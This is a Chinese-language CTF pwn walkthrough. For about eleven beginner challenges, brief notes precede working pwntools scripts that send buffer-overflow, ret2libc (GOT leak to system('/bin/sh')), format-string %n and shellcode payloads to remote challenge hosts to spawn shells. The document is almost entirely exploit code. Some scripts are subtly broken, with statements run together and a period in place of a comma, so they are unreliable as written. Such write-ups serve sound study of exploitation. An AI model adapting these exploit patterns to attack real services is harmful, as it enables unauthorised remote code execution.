when_did_you_born
我們通過溢出來覆蓋v5爲1926即可
代碼塊
from pwn import *
r = remote("124.126.19.106",31534)
payload = 'a'* (0x20-0x18) +p64(1926)
r.recvuntil("What's Your Birth?\n")
r.sendline("2000")
r.recvuntil("What's Your Name?\n")
r.sendline(payload)
print r.recv()
print r.recv()
hello_pwn
0x601068溢出4 bytes後輸入aaun即可
代碼塊
from pwn import *
r = remote("124.126.19.106",56061)
payload = 'a'* 4+p32(0x6e756161)
r.recvuntil("lets get helloworld for bof")
r.sendline(payload)
print r.recv()
print r.recv()
level0
覆蓋buf
from pwn import *
r = remote("124.126.19.106",48024)
r.send('a'*0x88+p64(0x400596))
r.interactive()
level2
初始的buf的空間只有0x88,但是讀取我們輸入的內容的時候,選擇的大小確實0x100,造成了溢出
from pwn import *
p = remote('124.126.19.106','37679')
system = 0x8048320
bin_sh = 0x804A024
payload = 'a' * (0x88 + 0x04) + p32(system) + p32(0) + p32(bin_sh)
p.send(payload)
p.interactive()
guess_num
直接覆蓋了60個重複的’a’即可
from pwn import *
from ctypes import *
p=remote("124.126.19.106","58368")
payload="a"*0x20+p64(1)
p.recvuntil("name:")
p.sendline(payload)
for i in range(10):
num = str(cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6").rand()%6 + 1)
p.recvuntil("number:")
p.sendline(num)
p.interactive()
int_overflow
對於一個2字節的Unsigned short int型變量,它的有效數據長度爲兩個字節,當它的數據長度超過兩個字節時,就溢出
from pwn import *
r = remote("124.126.19.106",59409)
return_address= 0x0804868B
r.sendlineafter(":", "1")
r.sendlineafter(":", "zzhwaxy")
r.recvuntil(":")
payload = "a" * 0x18 + p32(return_address)+"a"*(256-0x18)
r.sendline(payload)
r.interactive()
cgpwn2
和0x06 level2原理相同,唯一的區別在於此題沒有cat flag或/bin/sh的字符串,需要自己構造即可
from pwn import *
r = remote('124.126.19.106',59666)
target = 0x804855A
binsh = 0x804A080
payload = 'a'*0x26+'bbbb'+p32(target) +p32(binsh)
a = r.recvuntil('e\n')
r.sendline('/bin/sh')
a = r.recvuntil(':\n')
r.sendline(payload)
r.interactive()
level3
from pwn import *
#獲取遠程進程對象
p=remote('111.198.29.45',41496)
#獲取本地進程對象#p = process("./level3/level3")
#獲取文件對象
elf=ELF('./level3/level3')
#獲取lib庫對象
libc = ELF('./level3/libc_32.so.6')
#獲取函數
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
#接收數據
p.recvuntil(":\n")
#char[88] ebp write函數地址 write函數返回地址(返回到main函數) write函數參數一(1) write函數參數二(write_got地址) write函數參數三(寫4字節)
payload=0x88*'a'+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
#獲取write在got中的地址
write_got_addr=u32(p.recv())print hex(write_got_addr)
#計算lib庫加載基址
libc_base=write_got_addr-libc.sym['write']print hex(libc_base)
#計算system的地址
system_addr = libc_base+libc.sym['system']print hex(system_addr)
#計算字符串 /bin/sh 的地址。0x15902b爲偏移,通過命令:strings -a -t x libc_32.so.6 | grep "/bin/sh" 獲取
bin_sh_addr = libc_base + 0x15902bprint hex(bin_sh_addr)
#char[88] ebp system system函數的返回地址 system函數的參數(bin_sh_addr)
payload2=0x88*'a'+p32(0xdeadbeef)+p32(system_addr)+p32(0x11111111)+p32(bin_sh_addr)
#接收數據
p.recvuntil(":\n")
#發送payload
p.sendline(payload2)
#切換交互模式
p.interactive()
get_shell
直接運行即可
from pwn import *
context.log_level = 'debug'
io = remote('124.126.19.106',45753)
io.sendline('cat flag')
io.interactive()
string
通過格式化字符串漏洞修改v4[0]的值,使之與v4[1]相等。然後讀入shellcode並運行
from pwn import *
p = remote("124.126.19.106"."59075")
context(arch='amd64', os='linux', log_level='debug')
p.recvuntil('secret[0] is ')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
p.sendlineafter("What should your character's name be:", 'cxk')
p.sendlineafter("So, where you will go?east or up?:", 'east')
p.sendlineafter("go into there(1), or leave(0)?:", '1')
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
p.sendlineafter("And, you wish is:", '%85c%7$n')
shellcode = asm(shellcraft.sh())
p.sendlineafter("USE YOU SPELL", shellcode)
p.interactive()
CGfsb
我們需要將pwnme的地址輸入到s(也就是message)中去
在合適的位置上加一個`%n`,使其與我們輸入的地址對應從而造成漏洞利用即可
from pwn import *
r = remote('124.126.19.106',57188)
pwnme_addr = 0x0804A068
payload = p32(pwnme_addr) + 'aaaa' + '%10$n'
r.recvuntil("please tell me your name:\n")
r.sendline('BurYiA')
r.recvuntil("leave your message please:\n")
r.sendline(payload)
r.interactive()
攻略到這裏結束了~~~~~~~~